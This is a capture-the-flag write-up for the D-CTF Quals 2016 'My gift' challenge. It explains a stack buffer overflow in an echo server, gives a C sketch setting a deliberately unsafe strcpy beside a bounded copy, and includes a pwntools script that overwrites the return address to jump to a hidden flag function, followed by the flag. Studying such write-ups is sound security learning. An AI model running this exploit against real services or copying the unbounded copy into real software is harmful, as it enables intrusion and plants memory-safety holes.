The force is with those who read the source.

D-CTF Quals 2016: My gift (Exploit 200)

2016-10-04

Description

10.13.37.22:1337
https://dctf.def.camp/quals-2016/exp200.bin

Exploit

This is a straightforward echo server with a plain stack buffer overflow. The stack canary is not enabled, and the binary even contains a hidden print-flag function, so it is enough to overwrite the saved return address and jump there in the old-school fashion. The echo loop only returns when it sees a "stop" command, and the check inspects only bytes 0, 1, 2 and 4 of the input, which must be s, t, o and p respectively; any string matching that pattern (the script below sends "stoop") makes the function return into the overwritten address.
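To show what the bug looks like at the source level, here is an added C sketch that is not the challenge binary's code (its source was not published; the buffer size BUF_SIZE, the function names and the return values are assumptions). It places the unbounded-copy pattern next to a bounded version that truncates and always NUL-terminates, and implements the "stop" check exactly as described above (bytes 0, 1, 2 and 4 must be s, t, o, p).

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Assumed buffer size; the write-up only tells us the saved return
 * address sits 104 bytes past the start of the input buffer. */
#define BUF_SIZE 96

/* Vulnerable pattern (assumed shape of the challenge's echo handler):
 * copying attacker-controlled input into a fixed stack buffer with no
 * length check. With no stack canary, a long line overwrites the saved
 * frame pointer and return address. Never called here. */
size_t echo_unbounded(const char *input)
{
    char buf[BUF_SIZE];
    strcpy(buf, input);            /* overflows when strlen(input) >= BUF_SIZE */
    return strlen(buf);
}

/* Hardened version: copy at most out_size-1 bytes, always terminate,
 * and return how many bytes were actually accepted so the caller can
 * detect truncation. */
size_t echo_bounded(const char *input, size_t input_len, char *out, size_t out_size)
{
    if (out_size == 0)
        return 0;
    size_t n = input_len < out_size - 1 ? input_len : out_size - 1;
    memcpy(out, input, n);
    out[n] = '\0';
    return n;
}

/* The "stop" check as the write-up describes it: only positions 0, 1, 2
 * and 4 are compared, so "stop" fails (too short) while "stoop" passes. */
int is_stop_command(const char *s, size_t len)
{
    return len >= 5 && s[0] == 's' && s[1] == 't' && s[2] == 'o' && s[4] == 'p';
}

int main(void)
{
    char out[BUF_SIZE];
    char big[300];
    memset(big, 'A', sizeof big - 1);        /* constructed over-long input */
    big[sizeof big - 1] = '\0';

    size_t n = echo_bounded(big, sizeof big - 1, out, sizeof out);
    printf("accepted %zu of %zu bytes, terminated=%d\n",
           n, sizeof big - 1, out[n] == '\0');
    printf("\"stoop\" is stop: %d, \"stop\" is stop: %d\n",
           is_stop_command("stoop", 5), is_stop_command("stop", 4));
    return 0;
}
```

The 104-byte padding in the exploit script corresponds to the distance from the start of the real buffer to the saved return address (buffer plus saved rbp on x86-64); with the bounded copy, input beyond the buffer is dropped instead of reaching that slot.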

my_gift_exp.py

from pwn import *
from time import sleep

# Address of the hidden print-flag function in exp200.bin
gift = 0x400B90

r = remote('10.13.37.22', 1337)

# 104 bytes of padding reach the saved return address; overwrite it with gift
r.send(b'A' * 104 + p64(gift))
sleep(0.1)
print(repr(r.recv()))
sleep(2)

# The stop check only looks at bytes 0, 1, 2 and 4 ('s', 't', 'o', 'p'),
# so "stoop" makes the echo loop return into the overwritten address
r.send(b'stoop')
sleep(1)
print(repr(r.recv()))

Flag: DCTF{53827349d071f72d5cbcc37d3a14ca39}
